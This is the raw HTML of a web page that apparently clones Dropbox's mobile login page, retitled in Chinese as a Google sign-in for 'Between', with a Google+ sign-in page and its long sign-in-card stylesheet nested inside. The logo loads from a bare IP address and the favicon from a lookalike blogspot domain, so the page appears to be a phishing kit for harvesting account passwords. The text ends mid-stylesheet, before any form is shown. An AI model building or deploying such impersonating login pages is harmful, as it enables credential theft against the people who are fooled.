
<html lang="zh-Hant" xmlns:fb="http://ogp.me/ns/fb#" xml:lang="zh-Hant" class="media-mobile" 

xmlns="http://www.w3.org/1999/xhtml"><head><script nonce="RJKJ517KHiTxifyr3wnJ">
window._goch_ = {};
window.addEventListener('click', function(event) {
    'use strict';
    for (var elm = event.target; elm; elm = elm.parentElement) {
        if (elm.id &&
            window._goch_.hasOwnProperty(elm.id) &&
            window._goch_[elm.id].call(elm, event) === false) {
            event.preventDefault();
        }
    }
}, true);
window._csp_external_script_nonce = "d/SZb3ewMa19gW6mByuq"</script><meta content="IE=edge, chrome=1" http-equiv="X-UA-

Compatible"><link href="https://www.dropbox.com/m/login" rel="canonical"><meta content="noindex, nofollow, noimageindex" 

name="robots"><meta content="origin-when-cross-origin" name="referrer"><meta content="True" name="HandheldFriendly"><meta 

content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" name="viewport"><meta 

content="text/html; charset=utf-8" http-equiv="Content-type"><title>
使用Google登入Between</title><link href="./index_files/googlelogin.css" type="text/css" rel="stylesheet"><link 

href="https://cfl.dropboxstatic.com/static/images/favicon-vflk5FiAC.ico" rel="shortcut icon"><script type="text/javascript" 

nonce="RJKJ517KHiTxifyr3wnJ">if (window.netfront) { HTMLDivElement.prototype.attachEvent = HTMLDivElement.prototype.detachEvent = 

undefined; }</script><meta content="https://www.dropbox.com/m/login" property="og:url"><meta content="Dropbox" 

property="og:site_name"><meta content="website" property="og:type"><meta content="Dropbox 是免費的服務，讓您可以隨時隨地輕鬆存取您的

相片、文件和影片，並與他人共享。不需再使用電子郵件傳送檔案給自己。" property="og:description"><meta content="使用Google登入Between" 

property="og:title"><meta content="210019893730" property="fb:app_id"><meta 

content="https://cfl.dropboxstatic.com/static/images/brand/glyph@2x-vflJ1vxbq.png" property="og:image"><meta content="summary" 

name="twitter:card"><meta content="@Dropbox" name="twitter:site"><meta content="https://www.dropbox.com/m/login" 

name="twitter:url"><meta content="使用Google登入Between" name="twitter:title"><meta content="Dropbox 是免費的服務，讓您可以隨時隨地輕鬆存取

您的相片、文件和影片，並與他人共享。不需再使用電子郵件傳送檔案給自己。" name="twitter:description"><meta 

content="https://cfl.dropboxstatic.com/static/images/brand/glyph@2x-vflJ1vxbq.png" name="twitter:image"><meta 

content="TnuSyOnBMNmtugbpL1ZvW2PbSF9LKvoTzrvOGS9h-b0" name="google-site-verification"><meta content="EZKIczQcM1-

DVUMz8heu1dIhNtxNbLqbaA9-HbOnCQ4" name="google-site-verification"><meta content="tz8iotmk-pkhui406y41y5bfmfxdwmaa4a-

yc0hm6r0fga7s6j0j27qmgqkmc7oovihzghbzhbdjk-uiyrz438nxsjdbj3fggwgl8oq2nf4ko8gi7j4z7t78kegbidl4" name="norton-safeweb-site-

verification"> <meta content="app-id=327630330" name="apple-itunes-app"><link 

href="https://cfl.dropboxstatic.com/static/css/accessibility-vflRPMGHg.css" type="text/css" crossorigin="anonymous" 

rel="stylesheet"><link href="https://cfl.dropboxstatic.com/static/css/components/button-vflQd_sRP.css" type="text/css" 

crossorigin="anonymous" rel="stylesheet"><link href="https://cfl.dropboxstatic.com/static/css/packaged/components-vflv6eeXB.css" 

type="text/css" crossorigin="anonymous" rel="stylesheet"><link href="https://cfl.dropboxstatic.com/static/css/components/exp_cards-

vflriIPxd.css" type="text/css" crossorigin="anonymous" rel="stylesheet"><link 

href="https://cfl.dropboxstatic.com/static/css/components/login_form-vfl5m_4f4.css" type="text/css" crossorigin="anonymous" 

rel="stylesheet"><link href="https://cfl.dropboxstatic.com/static/css/login_or_register-vflR1JDlu.css" type="text/css" 

crossorigin="anonymous" rel="stylesheet"><link href="https://cfl.dropboxstatic.com/static/css/recaptcha_challenge-vflrcf67y.css" 

type="text/css" crossorigin="anonymous" rel="stylesheet"><link href="https://cfl.dropboxstatic.com/static/css/scooter/scooter-

scoped-vfl0UVTY2.css" type="text/css" crossorigin="anonymous" rel="stylesheet"><link href="https://fonts.googleapis.com/css?

family=Open+Sans:100,200,300,400,600,700&amp;subset=latin,latin-ext" type="text/css" rel="stylesheet"><script type="text/javascript" 

nonce="RJKJ517KHiTxifyr3wnJ">
            (function(){"use strict";var e,n=window,r=function(){e=[],n.addRequireLoadCallback=function(n){return e.push

(n)},n.configureRequire=function(){var e=arguments;n.addRequireLoadCallback(function(){return n.configureRequire.apply

(null,e)})},n.define=function(){var e=arguments;n.addRequireLoadCallback(function(){return n.define.apply(null,e)})}};r

(),n._insertRequireShim=r,n.InitRequireJs=function(r){n.requireContexts={},requirejs.onError=function(){},n.performance&&null!

=n.performance.now&&(requirejs.onResourceLoad=function(e,r,u){var i=n.performance.now(),o=n.requireContexts[e.id];o&&o.require

(["modules/clean/web_module_timing"],function(e){e.add_module(r,i,o.module_callback_times

[r.id])})}),n.configureRequire=r,n.addRequireLoadCallback=function(e){return e()},e.forEach(function(e){return e()})}})();
//# sourceMappingURL=init_requirejs.min.js.map
            window.GlobalConstants = {"CSP_SCRIPT_NONCE": "RJKJ517KHiTxifyr3wnJ"};
            </script><script async="async" type="text/javascript" 

src="https://cfl.dropboxstatic.com/static/compiled/js/alameda_bundle.min-vfl7SnUlF.js" nonce="d/SZb3ewMa19gW6mByuq"></script> <script 

type="text/javascript" nonce="RJKJ517KHiTxifyr3wnJ">
                var same_hostname = false;
                try {
                    same_hostname = (top.location.hostname === self.location.hostname);
                } catch (error) {}

                if (self != top && !same_hostname) {
                    top.location.replace(self.location.href);
                    setTimeout(function() {
                        window.DB_FRAME_BUST = true;
                        document.body.innerHTML = (
                            "<img src='https://www.dropbox.com/static/images/logo.png' 

onClick='top.location.href=window.location.href' />");
                    }, 1);
                }
            

        var _javascript_key = "k3mpvuSruqsYhUi5Wo8lpGYaJFSQRTXsaRYUZY2yWy8";
        var _js_post = false;

        var _cf = _cf || [];
        _cf.push(['_setJsPost', _js_post]);
        _cf.push(['_setJavaScriptKey', _javascript_key]);
        var itv=0; if (Date.now) itv = Date.now(); else itv = +new Date();
        _cf.push(['_setInitTime', itv]);
        _cf.push(['_setSDFieldNames', "pyxl8956025842278560239"]);
        _cf.push(['_setEnReadDocUrl', false]);
    </script><script data-requiremodule="modules/clean/web_module_timing" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-core.min-vflKZDWFC.js"></script><script data-

requiremodule="external/jquery_security_patch_bundle" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/jquery_security_patch_bundle.min-vfl7DZA4W.js"></script><script data-

requiremodule="modules/core/controller_registry" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-coreui.min-vfl-lIy4z.js"></script><script data-

requiremodule="mobile" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/mobile.min-vflu1h0qF.js"></script><script data-

requiremodule="modules/clean/legacy_pyxl_controllers/input" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-misc.min-vfl6UJwCG.js"></script><script data-

requiremodule="modules/clean/hi_res" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-ab.min-vflhGJyIc.js"></script><script data-

requiremodule="modules/clean/photos/batch_thumb_loader" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-nonpagelet_header.min-vflFv3bJl.js"></script><script 

data-requiremodule="external/sjcl-1.0.3" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/sjcl-1.0.3.min-vflRtcU5Z.js"></script><script data-

requiremodule="modules/clean/base64" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-browse.min-vflEx-J_3.js"></script><script data-

requiremodule="underscore" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-external.min-vflLPur1t.js"></script><script data-

requiremodule="modules/clean/legacy_pyxl_controllers/ajax_form" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-coreui-with-i18n.min-vflVoicg6.js"></script><script data-

requiremodule="modules/core/exception_tag_registry" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-exception-reporting.min-vflMPwYSH.js"></script><script 

data-requiremodule="modules/clean/profile_services/popup_handler" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-file_viewer.min-vfl2HVWZ3.js"></script><script data-

requiremodule="modules/clean/react/input" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-coreui-forms.min-vflb_xloG.js"></script><script data-

requiremodule="external/keymaster" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/keymaster.min-vflhXk8it.js"></script><script data-

requiremodule="external/sha1" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/sha1.min-vflnBGgMP.js"></script><script data-

requiremodule="modules/core/xhr" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-xhr-client.min-vflNq_6A5.js"></script><script data-

requiremodule="modules/clean/datetime" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-i18n.min-vflpGQmMJ.js"></script><script data-

requiremodule="external/purify" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/purify.min-vflWVv-6-.js"></script><script data-

requiremodule="external/u2f-api" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/u2f-api.min-vflSqVL-N.js"></script><script data-

requiremodule="modules/clean/deprecated/uirequest" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-maestro-prompt.min-vfl_R6YMi.js"></script><script data-

requiremodule="external/flux" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/flux.min-vfl1cTv_G.js"></script><script data-

requiremodule="external/pixie" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/external/pixie.min-vflYEO4rB.js"></script><script data-

requiremodule="external/react-15.3.1-prod" type="text/javascript" charset="utf-8" async="" 

src="https://cfl.dropboxstatic.com/static/compiled/js/packaged/pkg-react-15.3.1-prod.min-vflAS_Oxr.js"></script></head>
    <body class="zh_TW   " dir="ltr"> 
    <div id="login" class="ui-body-w page">
    <div id="menubar-login">
    <div class="ui-header ui-btn-none"><h2 aria-level="1" class="ui-title logo-title" tabindex="0">
    <img src="http://207.210.200.146/~goontone/jpeg/btlogo.png" data-hi-res-no-resize="True" data-hi-

res="http://207.210.200.146/~goontone/jpeg/btlogo.png" data-js-component-id="component8956025842278560238" alt="Dropbox 標

誌"></h2></div></div>
    <html lang="zh"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<link rel="shortcut icon" href="http://google-telecom.blogspot.tw/favicon.ico">
  <meta charset="utf-8">
  <meta content="width=300, initial-scale=1" name="viewport">
  <meta name="google" value="notranslate">
  <meta name="description" content="你可隨時隨地掌握最新動態；無論是查看特定社交圈的訊息、瀏覽「趣事」，或是前往「附近」訊息串瞭解附

近使用者的動態，皆易如反掌。">
  <title>歡迎使用 Google+</title>
<style>
  html, body {
  font-family: Arial, sans-serif;
  background: #fff;
  margin: 0;
  padding: 0;
  border: 0;
  position: absolute;
  height: 100%;
  min-width: 100%;
  font-size: 13px;
  color: #404040;
  direction: ltr;
  -webkit-text-size-adjust: none;
  }
  button,
  input[type=button],
  input[type=submit] {
  font-family: Arial, sans-serif;
  font-size: 13px;
  }
  a,
  a:hover,
  a:visited {
  color: #427fed;
  cursor: pointer;
  text-decoration: none;
  }
  a:hover {
  text-decoration: underline;
  }
  h1 {
  font-size: 20px;
  color: #262626;
  margin: 0 0 15px;
  font-weight: normal;
  }
  h2 {
  font-size: 14px;
  color: #262626;
  margin: 0 0 15px;
  font-weight: bold;
  }
  input[type=email],
  input[type=number],
  input[type=password],
  input[type=tel],
  input[type=text],
  input[type=url] {
  -moz-appearance: none;
  -webkit-appearance: none;
  appearance: none;
  display: inline-block;
  height: 36px;
  padding: 0 8px;
  margin: 0;
  background: #fff;
  border: 1px solid #d9d9d9;
  border-top: 1px solid #c0c0c0;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 1px;
  font-size: 15px;
  color: #404040;
  }
  input[type=email]:hover,
  input[type=number]:hover,
  input[type=password]:hover,
  input[type=tel]:hover,
  input[type=text]:hover,
  input[type=url]:hover {
  border: 1px solid #b9b9b9;
  border-top: 1px solid #a0a0a0;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  }
  input[type=email]:focus,
  input[type=number]:focus,
  input[type=password]:focus,
  input[type=tel]:focus,
  input[type=text]:focus,
  input[type=url]:focus {
  outline: none;
  border: 1px solid #4d90fe;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  }
  input[type=checkbox],
  input[type=radio] {
  -webkit-appearance: none;
  display: inline-block;
  width: 13px;
  height: 13px;
  margin: 0;
  cursor: pointer;
  vertical-align: bottom;
  background: #fff;
  border: 1px solid #c6c6c6;
  -moz-border-radius: 1px;
  -webkit-border-radius: 1px;
  border-radius: 1px;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  position: relative;
  }
  input[type=checkbox]:active,
  input[type=radio]:active {
  background: #ebebeb;
  }
  input[type=checkbox]:hover {
  border-color: #c6c6c6;
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  }
  input[type=radio] {
  -moz-border-radius: 1em;
  -webkit-border-radius: 1em;
  border-radius: 1em;
  width: 15px;
  height: 15px;
  }
  input[type=checkbox]:checked,
  input[type=radio]:checked {
  background: #fff;
  }
  input[type=radio]:checked::after {
  content: '';
  display: block;
  position: relative;
  top: 3px;
  left: 3px;
  width: 7px;
  height: 7px;
  background: #666;
  -moz-border-radius: 1em;
  -webkit-border-radius: 1em;
  border-radius: 1em;
  }
  input[type=checkbox]:checked::after {
  content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);
  display: block;
  position: absolute;
  top: -6px;
  left: -5px;
  }
  input[type=checkbox]:focus {
  outline: none;
  border-color: #4d90fe;
  }
  .stacked-label {
  display: block;
  font-weight: bold;
  margin: .5em 0;
  }
  .hidden-label {
  position: absolute !important;
  clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
  clip: rect(1px, 1px, 1px, 1px);
  height: 0px;
  width: 0px;
  overflow: hidden;
  visibility: hidden;
  }
  input[type=checkbox].form-error,
  input[type=email].form-error,
  input[type=number].form-error,
  input[type=password].form-error,
  input[type=text].form-error,
  input[type=tel].form-error,
  input[type=url].form-error {
  border: 1px solid #dd4b39;
  }
  .error-msg {
  margin: .5em 0;
  display: block;
  color: #dd4b39;
  line-height: 17px;
  }
  .help-link {
  background: #dd4b39;
  padding: 0 5px;
  color: #fff;
  font-weight: bold;
  display: inline-block;
  -moz-border-radius: 1em;
  -webkit-border-radius: 1em;
  border-radius: 1em;
  text-decoration: none;
  position: relative;
  top: 0px;
  }
  .help-link:visited {
  color: #fff;
  }
  .help-link:hover {
  color: #fff;
  background: #c03523;
  text-decoration: none;
  }
  .help-link:active {
  opacity: 1;
  background: #ae2817;
  }
  .wrapper {
  position: relative;
  min-height: 100%;
  }
  .content {
  padding: 0 44px;
  }
  .main {
  padding-bottom: 100px;
  }
  /* For modern browsers */
  .clearfix:before,
  .clearfix:after {
  content: "";
  display: table;
  }
  .clearfix:after {
  clear: both;
  }
  /* For IE 6/7 (trigger hasLayout) */
  .clearfix {
  zoom:1;
  }
  .google-header-bar {
  height: 71px;
  border-bottom: 1px solid #e5e5e5;
  overflow: hidden;
  }
  .header .logo {
  margin: 17px 0 0;
  float: left;
  height: 38px;
  width: 116px;
  }
  .header .secondary-link {
  margin: 28px 0 0;
  float: right;
  }
  .header .secondary-link a {
  font-weight: normal;
  }
  .google-header-bar.centered {
  border: 0;
  height: 108px;
  }
  .google-header-bar.centered .header .logo {
  float: none;
  margin: 40px auto 30px;
  display: block;
  }
  .google-header-bar.centered .header .secondary-link {
  display: none
  }
  .google-footer-bar {
  position: absolute;
  bottom: 0;
  height: 35px;
  width: 100%;
  border-top: 1px solid #e5e5e5;
  overflow: hidden;
  }
  .footer {
  padding-top: 7px;
  font-size: .85em;
  white-space: nowrap;
  line-height: 0;
  }
  .footer ul {
  float: left;
  max-width: 80%;
  padding: 0;
  }
  .footer ul li {
  color: #737373;
  display: inline;
  padding: 0;
  padding-right: 1.5em;
  }
  .footer a {
  color: #737373;
  }
  .lang-chooser-wrap {
  float: right;
  display: inline;
  }
  .lang-chooser-wrap img {
  vertical-align: top;
  }
  .lang-chooser {
  font-size: 13px;
  height: 24px;
  line-height: 24px;
  }
  .lang-chooser option {
  font-size: 13px;
  line-height: 24px;
  }
  .hidden {
  height: 0px;
  width: 0px;
  overflow: hidden;
  visibility: hidden;
  display: none !important;
  }
  .banner {
  text-align: center;
  }
  .card {
  background-color: #f7f7f7;
  padding: 20px 25px 30px;
  margin: 0 auto 25px;
  width: 304px;
  -moz-border-radius: 2px;
  -webkit-border-radius: 2px;
  border-radius: 2px;
  -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  }
  .card > *:first-child {
  margin-top: 0;
  }
  .rc-button,
  .rc-button:visited {
  display: inline-block;
  min-width: 46px;
  text-align: center;
  color: #444;
  font-size: 14px;
  font-weight: 700;
  height: 36px;
  padding: 0 8px;
  line-height: 36px;
  -moz-border-radius: 3px;
  -webkit-border-radius: 3px;
  border-radius: 3px;
  -o-transition: all 0.218s;
  -moz-transition: all 0.218s;
  -webkit-transition: all 0.218s;
  transition: all 0.218s;
  border: 1px solid #dcdcdc;
  background-color: #f5f5f5;
  background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
  background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
  -o-transition: none;
  -moz-user-select: none;
  -webkit-user-select: none;
  user-select: none;
  cursor: default;
  }
  .card .rc-button {
  width: 100%;
  padding: 0;
  }
  .rc-button.disabled,
  .rc-button[disabled] {
  opacity: .5;
  filter: alpha(opacity=50);
  cursor: default;
  pointer-events: none;
  }
  .rc-button:hover {
  border: 1px solid #c6c6c6;
  color: #333;
  text-decoration: none;
  -o-transition: all 0.0s;
  -moz-transition: all 0.0s;
  -webkit-transition: all 0.0s;
  transition: all 0.0s;
  background-color: #f8f8f8;
  background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
  background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
  -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  }
  .rc-button:active {
  background-color: #f6f6f6;
  background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
  background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
  -moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  }
  .rc-button-submit,
  .rc-button-submit:visited {
  border: 1px solid #3079ed;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.1);
  background-color: #4d90fe;
  background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
  background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
  background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
  background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
  background-image: linear-gradient(top,#4d90fe,#4787ed);
  }
  .rc-button-submit:hover {
  border: 1px solid #2f5bb7;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.3);
  background-color: #357ae8;
  background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
  background-image: linear-gradient(top,#4d90fe,#357ae8);
  }
  .rc-button-submit:active {
  background-color: #357ae8;
  background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
  background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
  background-image: linear-gradient(top,#4d90fe,#357ae8);
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  }
  .rc-button-red,
  .rc-button-red:visited {
  border: 1px solid transparent;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.1);
  background-color: #d14836;
  background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
  background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
  background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
  background-image: -o-linear-gradient(top,#dd4b39,#d14836);
  background-image: linear-gradient(top,#dd4b39,#d14836);
  }
  .rc-button-red:hover {
  border: 1px solid #b0281a;
  color: #fff;
  text-shadow: 0 1px rgba(0,0,0,0.3);
  background-color: #c53727;
  background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
  background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
  background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
  background-image: -o-linear-gradient(top,#dd4b39,#c53727);
  background-image: linear-gradient(top,#dd4b39,#c53727);
  }
  .rc-button-red:active {
  border: 1px solid #992a1b;
  background-color: #b0281a;
  background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
  background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
  background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
  background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
  background-image: linear-gradient(top,#dd4b39,#b0281a);
  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  }
  .secondary-actions {
  text-align: center;
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .google-header-bar.centered {
  height: 83px;
  }
  .google-header-bar.centered .header .logo {
  margin: 25px auto 20px;
  }
  .card {
  margin-bottom: 20px;
  }
</style>
<style media="screen and (max-width: 580px)">
  html, body {
  font-size: 14px;
  }
  .google-header-bar.centered {
  height: 73px;
  }
  .google-header-bar.centered .header .logo {
  margin: 20px auto 15px;
  }
  .content {
  padding-left: 10px;
  padding-right: 10px;
  }
  .hidden-small {
  display: none;
  }
  .card {
  padding: 20px 15px 30px;
  width: 270px;
  }
  .footer ul li {
  padding-right: 1em;
  }
  .lang-chooser-wrap {
  display: none;
  }
</style>
<style>
  pre.debug {
  font-family: monospace;
  position: absolute;
  left: 0;
  margin: 0;
  padding: 1.5em;
  font-size: 13px;
  background: #f1f1f1;
  border-top: 1px solid #e5e5e5;
  direction: ltr;
  white-space: pre-wrap;
  width: 90%;
  overflow: hidden;
  }
</style>
<style>
  .banner {
  text-align: center;
  }
  .banner h1 {
  font-family: 'Open Sans', arial;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 42px;
  font-weight: 300;
  margin-top: 0;
  margin-bottom: 20px;
  }
  .banner h2 {
  font-family: 'Open Sans', arial;
  -webkit-font-smoothing: antialiased;
  color: #555;
  font-size: 18px;
  font-weight: 400;
  margin-bottom: 20px;
  }
  .signin-card {
  width: 274px;
  padding: 40px 40px;
  }
  .signin-card .profile-img {
  width: 96px;
  height: 96px;
  margin: 0 auto 10px;
  display: block;
  -moz-border-radius: 50%;
  -webkit-border-radius: 50%;
  border-radius: 50%;
  }
  .signin-card .profile-name {
  font-size: 16px;
  font-weight: bold;
  text-align: center;
  margin: 10px 0 0;
  min-height: 1em;
  }
  .signin-card input[type=email],
  .signin-card input[type=password],
  .signin-card input[type=text],
  .signin-card input[type=submit] {
  width: 100%;
  display: block;
  margin-bottom: 10px;
  z-index: 1;
  position: relative;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  }
  .signin-card #Email,
  .signin-card #Passwd,
  .signin-card .captcha {
  direction: ltr;
  height: 44px;
  font-size: 16px;
  }
  .signin-card #Email + .stacked-label {
  margin-top: 15px;
  }
  .signin-card #reauthEmail {
  display: block;
  margin-bottom: 10px;
  line-height: 36px;
  padding: 0 8px;
  font-size: 15px;
  color: #404040;
  line-height: 2;
  margin-bottom: 10px;
  font-size: 14px;
  text-align: center;
  overflow: hidden;
  text-overflow: ellipsis;
  white-space: nowrap;
  -moz-box-sizing: border-box;
  -webkit-box-sizing: border-box;
  box-sizing: border-box;
  }
  .one-google p {
  margin: 0 0 10px;
  color: #555;
  font-size: 14px;
  text-align: center;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 60px;
  }
  .one-google img {
  display: block;
  width: 210px;
  height: 17px;
  margin: 10px auto;
  }
</style>
<style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  .banner h1 {
  font-size: 38px;
  margin-bottom: 15px;
  }
  .banner h2 {
  margin-bottom: 15px;
  }
  .one-google p.create-account,
  .one-google p.switch-account {
  margin-bottom: 30px;
  }
  .signin-card #Email {
  margin-bottom: 0;
  }
  .signin-card #Passwd {
  margin-top: -1px;
  }
  .signin-card #Email.form-error,
  .signin-card #Passwd.form-error {
  z-index: 2;
  }
  .signin-card #Email:hover,
  .signin-card #Email:focus,
  .signin-card #Passwd:hover,
  .signin-card #Passwd:focus {
  z-index: 3;
  }
</style>
<style media="screen and (max-width: 580px)">
  .banner h1 {
  font-size: 22px;
  margin-bottom: 15px;
  }
  .signin-card {
  width: 260px;
  padding: 20px 20px;
  margin: 0 auto 20px;
  }
  .signin-card .profile-img {
  width: 72px;
  height: 72px;
  -moz-border-radius: 72px;
  -webkit-border-radius: 72px;
  border-radius: 72px;
  }
</style>
<style>
  .jfk-tooltip {
  background-color: #fff;
  border: 1px solid;
  color: #737373;
  font-size: 12px;
  position: absolute;
  z-index: 800 !important;
  border-color: #bbb #bbb #a8a8a8;
  padding: 16px;
  width: 250px;
  }
 .jfk-tooltip h3 {
  color: #555;
  font-size: 12px;
  margin: 0 0 .5em;
  }
 .jfk-tooltip-content p:last-child {
  margin-bottom: 0;
  }
  .jfk-tooltip-arrow {
  position: absolute;
  }
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
  display: block;
  height: 0;
  position: absolute;
  width: 0;
  }
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
  border: 9px solid;
  }
  .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
  border: 8px solid;
  }
  .jfk-tooltip-arrowdown {
  bottom: 0;
  }
  .jfk-tooltip-arrowup {
  top: -9px;
  }
  .jfk-tooltip-arrowleft {
  left: -9px;
  top: 30px;
  }
  .jfk-tooltip-arrowright {
  right: 0;
  top: 30px;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
  border-color: #bbb transparent;
  left: -9px;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
  border-color: #a8a8a8 transparent;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
  border-color: #fff transparent;
  left: -8px;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
  border-bottom-width: 0;
  }
  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
  border-bottom-width: 0;
  }
